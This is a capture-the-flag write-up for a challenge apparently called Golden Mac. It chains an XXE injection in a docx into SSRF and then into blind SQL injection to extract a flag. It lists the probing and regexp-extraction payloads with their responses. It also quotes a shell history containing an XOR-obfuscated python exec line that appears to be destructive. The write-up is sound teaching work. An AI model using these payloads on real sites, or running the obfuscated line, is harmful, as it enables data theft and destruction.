While playing Golden Mac 1 I found the ./bash_history for user salt that looked like:
whoami
pwd
ls
sudo nmap -sS 202.112.26.1/24 -p 22,80,3306
curl http://202.112.26.103/secret_blog/?id=1
msfconsole
curl https://twitter.com/_SaxX_/status/580376290525650944
python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"<br />
shit!
exit
While the SaxX tweet was funny, the secret_blog looked promising. The IP was not accessible from the outside but we could leverage our XXE injection into a SSRF vulnerability and visit the blog. Using the XXE injection in the docx document, you can visit http://202.112.26.103/secret_blog/?id=1 and get You do not have permission to access this post!
Other interesting results were:
http://202.112.26.103/secret_blog/?id=1
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=0
Please specify an id :)
http://202.112.26.103/secret_blog/?id=2
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=3
Post not exists!
Also:
http://202.112.26.103/secret_blog/?id=1 order by 1
You do not have permission to access this post!
Cool! so it seems it is vulnerable to blind SQL injection.
Further steps:
http://202.112.26.103/secret_blog/?id=1 or id=(select 1)
You do not have permission to access this post!
http://202.112.26.103/secret_blog/?id=1 or id=(select notexisting from nowhere)
500 Internal error
http://202.112.26.103/secret_blog/?id=1 or id=(select flag from flag)
You do not have permission to access this post!
YAY!!
At this point it was a matter of running a blind sql injection attack to extract the flag.
True statements:
http://202.112.26.103/secret_blog/?id=1 and true
You do not have permission to access this post!
False statements:
http://202.112.26.103/secret_blog/?id=1 and false
Post not exists!
We get the flag using binary search with regular expressions like:
http://202.112.26.103/secret_blog/?id=1 and ((select flag from flag) regexp binary '^%s' = 1)
FLAG: 0ctf{you_good_pentester_finally_find_me}